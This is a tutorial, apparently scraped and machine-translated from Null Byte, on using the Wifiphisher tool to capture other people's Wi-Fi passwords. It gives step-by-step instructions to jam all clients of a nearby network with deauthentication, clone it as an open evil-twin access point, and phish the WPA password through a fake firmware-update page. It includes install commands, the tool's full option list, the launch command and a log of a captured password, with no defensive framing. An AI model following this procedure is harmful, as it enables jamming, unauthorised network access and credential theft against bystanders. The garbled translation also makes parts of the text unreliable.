قالب وردپرس درنا توس
Home / Tips and Tricks / Get everyone's Wi-Fi password without cracking Wifiphisher «Null Byte :: WonderHowTo

Get everyone's Wi-Fi password without cracking Wifiphisher «Null Byte :: WonderHowTo



While cracking passwords and WPS setup attacks attract a lot of attention, social engineering attacks are by far the quickest way to get a Wi-Fi password. Wifiphisher is one of the most powerful Wi-Fi social engineering attacks, a tool that blocks the Internet until desperate users enter the Wi-Fi password to allow a fake router firmware update.

Social engineering attacks are powerful because they often completely bypass security. If you can trick an employee into typing a password into a fake login page, it does not matter how strong the password is. This is the opposite of attacks where you use the computer's power to try out a huge list of passwords incredibly quickly. Because of the way this attack works, you can not succeed if the password you are attacking is strong and is not in your password list.

If you do not know how strong the attacked password is, it can be frustrating because the attack is frustrating. Time and processing power associated with a brute-force attack can make the dry feeling look like a huge waste of resources to let. Instead, tools like Wifiphisher ask questions about the people behind these networks. Does the average user know what the login page of their wireless router looks like? Would you know if it would be different? More importantly, would a busy user who is disconnected and stressed from the Internet still enter the password to activate a fake update, even if he notices that the login page looks a little different?

Wifiphisher believes that the answer is "Yes." To test this theory, the tool can select a nearby Wi-Fi network, de-authenticate all users (jamming), and create a clone access point that does not require a password. Anyone who joins the evil, twin-network network will see a compelling-looking phishing page that requires the Wi-Fi password to enable a firmware update. This is the reason why the Wi-Fi does not work anymore.

The firmware update from Hell

In a social engineering attack, the first signs of Wifiphisher look like a problem with the router. At first the WLAN fails. You can still see the network, but every connection attempt fails immediately. Other devices can not connect to the network, and they realize that not just one device, but every wireless device has lost connection to the network.

They notice a new network with the same name as the old network but no password required. After a few more attempts to connect to the protected network, they join the open network, worried that their router will suddenly send a network without a password, to which anyone can access. As soon as they join, an official-looking website will be opened with the router's manufacturer informing them that the router is undergoing an important firmware upgrade. The Internet will not work until you enter the password to apply the update.

After entering the highly secure Wi-Fi password, a loading screen crawls across the screen when the router restarts and you are a bit proud of the security of your router by installing this important update. After waiting a minute, their devices reconnect to the network, now they are more secure thanks to the installed update.

Easy Access with a Bossy Update

For a hacker, retrieving passwords is as simple as choosing the network you want to target. After you set a destination, Wifiphisher immediately blocks all devices connected to the network. This increases the likelihood that a person connected to the network will be frustrated and will apply the fake update. Next, the network information of the destination is cloned and the spoofed Wi-Fi network is broadcast for the destination to believe the router is in an indefinite update mode.

Devices that connect are immediately logged to a list of connected targets. and the phishing page is tailored to the manufacturer of the router by reading the first part of the router's MAC address. After the Wifiphisher persuades one of the destinations connected to the destination network to enter the password, it informs the hacker while blocking the time. After sending the captured password, the target is cruelly busy with a fake update load screen and an incorrect reboot timer to give the hacker time to test the captured password.

What you need

For this attack to work, you need a Kali Linux-compatible wireless adapter. If you are not sure which choices you should make, read one of the guides by selecting one that supports watch mode and package injection.

From left to right from the top: Alfa AWUS036NH; Alfa AWUS051NH; TP-LINK TL-WN722N; Alfa AWUS036NEH; Panda PAU05; Alfa AWUS036H; Alfa AWUS036NHA. Image by SADMIN / Null Byte

Apart from a good wireless adapter, you need a computer running Kali Linux. You should upgrade this first by performing apt update and apt upgrade . Failure to do so will likely cause problems during the following Wifiphisher installation process.

Step 1: Install Wifiphisher

To start, you can open a terminal window and type apt install wifiphisher to install Wifiphisher.

  apt install Wifiphisher 
  Read package lists ... Done
Create dependency tree
Status information is read ... Done
The following packages were automatically installed and are no longer needed:
guile-2.0-libs libbind9-160 libdns-export1102 libdns1100 libenca0
libexempi3 libgdbm5 libgeos-3.7.0 libhunspell-1.6-0 libirs160
libisc-export169 libisc169 libisccc160 libisccfg160 liblouis16
liblvm2app2.2 liblvm2cmd2.02 liblwres160 libnfs11 libnftnl7
libntfs-3g88 libomp5 libopencv-core3.2 libopencv-imgproc3.2 libperl5.26
libpoppler74 libpoppler80 libprotobuf-lite10 libprotobuf10
libqgis-analysis2.14.21 libqgis-core2.14.21 libqgis-core2.18.24
libqgis-gui2.14.21 libqgis-gui2.18.24 libqgis-networkanalysis2.14.21
libqgis-server2.14.21 libqgispython2.14.21 libradare2-2.9
libradare2-3.0 libsane-extras libsane-extras-common libtbb2
libuhd3.12.0 libunbound2 linux-image-4.16.0-kali2-amd64 php7.2-mysql
python-anyjson python-capstone python-couchdbkit python-http-parser
python-jwt python-libemu python-pam python-restkit python-socketpool
x11proto-dri2-dev x11proto-gl-dev
Use "apt autoremove" to remove it.
The following additional packages will be installed:
python-pbkdf2 python-pyric python-roguehostapd
Suggested packages:
python-pyric-doc
The following NEW packages will be installed:
Python-Pbkdf2 Python-Pyric Python-Roguehostapd Wifiphisher
0 updated, 4 reinstalled, 0 removed and 422 not updated.
4,579 kB archives are required.
After this process, you will need 10.8 MB of additional disk space.
Would you like to continue? [Y/n] y
Get: 1 http://mirrors.ocf.berkeley.edu/kali kali-rolling / main amd64 python-pbkdf2 all 1.3 + 20110613.git2a0fb15 ~ ds0-3 [7,398 B]
Get: 2 http://mirrors.ocf.berkeley.edu/kali kali-rolling / main amd64 python-pyric all 0.1.6-0kali1 [308 kB]
Get: 3 http://mirrors.ocf.berkeley.edu/kali kali-rolling / main amd64 python-roguehostapd amd64 1.2.3-0kali2 [402 kB]
Get: 4 http://mirrors.ocf.berkeley.edu/kali kali-rolling / main amd64 wifiphisher all 1.4 + git20180525-0kali2 [3,862 kB]
4,579 kB in 10s (458 kB / s)
Select the previously unselected package python-pbkdf2.
(Reading the database ... 431969 Files and directories are currently installed.)
Preparation for unpacking ... / python-pbkdf2_1.3 + 20110613.git2a0fb15 ~ ds0-3_all.deb ...
Unpack Python-pbkdf2 (1.3 + 20110613.git2a0fb15 ~ ds0-3) ...
Selection of the previously unselected package python-pyric.
Preparation for unpacking ... / python-pyric_0.1.6-0kali1_all.deb ...
Unpack Python Pyric (0.1.6-0kali1) ...
Select the previously unselected package python-roguehostapd.
Preparation for unpacking ... / python-roguehostapd_1.2.3-0kali2_amd64.deb ...
Unpack Python roguehostapd (1.2.3-0kali2) ...
Select a previously unselected pak wiper.
Preparation for unpacking ... / wifiphisher_1.4 + git20180525-0kali2_all.deb ...
Unpack Wifiphisher (1.4 + git20180525-0kali2) ...
Set up Python-roguehostapd (1.2.3-0kali2) ...
Setting up python-pbkdf2 (1.3 + 20110613.git2a0fb15 ~ ds0-3) ...
Set up Python-Pyric (0.1.6-0kali1) ...
Set up Wifiphisher (1.4 + git20180525-0kali2) ...

Progress: [ 95%] [#######################################################...]

If you want to try installing through the GitHub repo, you can do so by cloning the repository and following the instructions on the GitHub page:

  git clone https://github.com/ wifiphisher / wifiphisher.git
cd wifiphisher
sudo python setup.py install 

This should install Wifiphisher, which you can start by entering the program name in a terminal window.

Step 2: Check the wifiphisher flags

You should be able to run the script at any time simply by typing sudo wifiphisher in a terminal window. While Wifiphisher does not have a man page, on its – help page, you can see that there is a pretty impressive list of configuration options that you can change by adding different flags to the command.

  wifiphisher --help 
  Use: Wifiphisher [-h] [-i INTERFACE] [-eI EXTENSIONSINTERFACE]
                   [-aI APINTERFACE] [-iI INTERNETINTERFACE]
                   [-iAM MAC_AP_INTERFACE] [-iEM MAC_EXTENSIONS_INTERFACE]
                   [-iNM] [-kN] [-nE] [-nD]
                   [-dC DEAUTH_CHANNELS [DEAUTH_CHANNELS ...]] [-e ESSID]
                   [-dE DEAUTH_ESSID] [-p PHISHINGSCENARIO] [-pK PRESHAREDKEY]
                   [-hC HANDSHAKE_CAPTURE] [-qS] [-lC] [-lE LURE10_EXPLOIT]
                   [--logging] [-dK] [-lP LOGPATH] [-cP CREDENTIAL_LOG_PATH]
                   [--payload-path PAYLOAD_PATH] [-cM] [-wP]
                   [-wAI WPSPBC_ASSOC_INTERFACE] [-kB] [-fH]
                   [-pPD PHISHING_PAGES_DIRECTORY]
                   [--dnsmasq-conf DNSMASQ_CONF] [-pE PHISHING_ESSID]

  optional arguments:
-h, --help View and exit this help message
-i INTERFACE, - INTERFACE INTERFACE
Manually select an interface that supports both AP and
Monitor modes for spawning the rogue AP as well
install additional Wi-Fi attacks from extensions
(i.e., deauth). Example: -i wlan1
-eI EXTENSIONSINTERFACE, --extensionsinterface EXTENSIONSINTERFACE
Manually select an interface that supports the monitor
Mode to defuse the victims. Example: -eI
wlan1
-aI APINTERFACE, --apinterface APINTERFACE
Manually select an interface for which AP mode is supported
Spawning rogues AP. Example: -aI wlan0
-iI INTERNETINTERFACE, --internetinterface INTERNETINTERFACE
Choose an interface that is connected to the
InternetExample: -iI ppp0
-iAM MAC_AP_INTERFACE, --mac-ap-interface MAC_AP_INTERFACE
Enter the MAC address of the AP interface
-iEM MAC_EXTENSIONS_INTERFACE, --mac-extensions-interface MAC_EXTENSIONS_INTERFACE
Enter the MAC address of the expansion interface
-iNM, -no-mac-randomization
Do not change a MAC address
-kN, --keepnetworkmanager
Do not quit NetworkManager
-nE, --noextensions Do not load extensions.
-nD, --nodeauth Skips the deauthentication phase.
-dC DEAUTH_CHANNELS [DEAUTH_CHANNELS ...] - deauth-channels DEAUTH_CHANNELS [DEAUTH_CHANNELS ...]
Channels to deauth. Example: --deauth-channels 1,3,7
-e ESSID, --essid ESSID
Enter the ESSID of the rogue access point. This option
skips the access point selection phase. Example:
--essid & # 39; Free WiFi & # 39;
-dE DEAUTH_ESSID, --deauth-essid DEAUTH_ESSID
Remove all BSSIDs in WLAN with this ESSID.
-p PHISHINGSCENARIO, --phishingscenario PHISHINGSCENARIO
Select the phishing scenario that you want to run. This option is displayed
Skip the scenario selection phase. Example: -p
firmware_upgrade
-pK PRESHAREDKEY, --presharedkey PRESHAREDKEY
Add the WPA / WPA2 protection for the rogue access point.
Example: -pK s3cr3tp4ssw0rd
-HC HANDSHAKE_CAPTURE, --handshake-capture HANDSHAKE_CAPTURE
Capture the WPA / WPA2 handshakes for review
passphraseExample: -hC capture.pcap
-qS, --quitonsuccess Stop the script after you successfully retrieve a pair
of testimonies
-lC, --lure10-capture
Enter the BSSIDs of the detected APs
during the AP selection phase. This option is part of
Lure10 attack.
-lE LURE10_EXPLOIT, --lure10-exploit LURE10_EXPLOIT
Make Windows Windows locator near you
User to believe that it is in an area that was
previously recorded with --lure10-capture. part of
Lure10 attack.
--Logging log activity in file
-dK, --disable-karma Disables the KARMA attack
-lP LOGPATH, --logpath LOGPATH
Determine the full path of the log file.
-cP CREDENTIAL_LOG_PATH, --credential-log-path CREDENTIAL_LOG_PATH
Determine the full path of the file to be saved
all recorded evidence
--Payload path PAYLOAD_PATH
Payload path for scenarios that serve a payload
-cM, --channel monitor
Monitor if the destination access point changes the channel.
-wP, --wps-pbc Monitor if the button is present on a WPS PBC Registrar
pressed.
-wAI WPSPBC_ASSOC_INTERFACE, --wpspbc-assoc-interface WPSPBC_ASSOC_INTERFACE
The WLAN interface used to map to the WPS
Access point.
-kB, --known-beacons Sends a series of beacon frames
popular Wi-Fi
-fH, --force-hostapd Forces the use of the hostapd installed in the system
-pPD PHISHING_PAGES_DIRECTORY, --phishing-pages-directory PHISHING_PAGES_DIRECTORY
Search for phishing sites at this point
--dnsmasq-conf DNSMASQ_CONF
Determine the full path of a custom dnmasq.conf file
-pE PHISHING_ESSID, --phishing-essid PHISHING_ESSID
Determine the ESSID you want to use for phishing
Page 

Step 3: Plug in your wireless adapter

Now is the time to prepare the wireless adapter by plugging it in. Wifiphisher puts your card in Wi-Fi surveillance mode for you if you do not do it yourself

Step 4: Run the Script

I will use my USB wireless network adapter, so I add a -i flag and the name of my network adapter to the command. Otherwise, Wifiphisher will simply pick up the network adapter.

To start the script I execute the following command:

  sudo wifiphisher -i wlan1 

After that, we should see a page showing every nearby network. We can choose which network we want to attack, and then press [Enter] .

Next the script will ask Which attack do you want to execute? Select option 2.

After you have selected the attack, it will start immediately. It opens a page that listens for targets joining the network. Wifiphisher also looks for devices that try to connect to networks that do not exist and creates fake versions to attract these devices to connect to.

After a destination has logged in, a pop-up window prompts for the password.

If the destination enters the password, we will be notified in the "Wifiphisher" screen.

That's it! The script will exit and show you the password just entered.

  [*] Starting Wifiphisher 1.4GIT (https://wifiphisher.org) at 2019-02-04 08:10
[+] Time zone detected. Set channel range to 1-13
[+] Selection of the wfphshr-wlan0 interface for the Deauthentication Attack
[+] Selection of the wlan1 interface for creating the rogue access point
[+] Change the MAC address of wlan1 (BSSID) to 00: 00: 00: 31: 8c: e5
[!] The MAC address could not be set. (Tried 00: 00: 00: ee: 5c: 95)
[+] SIGKILL is sent to wpa_supplicant
[+] SIGKILL is sent to dhclient
[+] SIGKILL is sent to dhclient
[+] Sending SIGKILL to NetworkManager
[*] Leasing contracts deleted, DHCP started, iptables set up
[+] Selection of firmware update page template
[*] The wrong access point is started ...
[*] Start the HTTP / HTTPS server at ports 8080, 443
[+] Show your support!
[+] Follow us: https://twitter.com/wifiphisher
[+] Like us: https://www.facebook.com/Wifiphisher
[+] Recorded evidence:
wfphshr-wpa-password = mypassword
[!] Close 

You've bypassed password security and tricked a user into entering the Wi-Fi password into your wrong network. Worse, they're still behind that dreadful, slow-moving, fake loading screen.

If you're looking for a cheap device A handy platform for getting started with Wifipfisher. Take a look at our Kali Linux Raspberry Pi build with the $ 35 Raspberry Pi.

Cover Picture by Justin Meyers / Gadget Hacks; Screenshots of Kody / Null Byte




Source link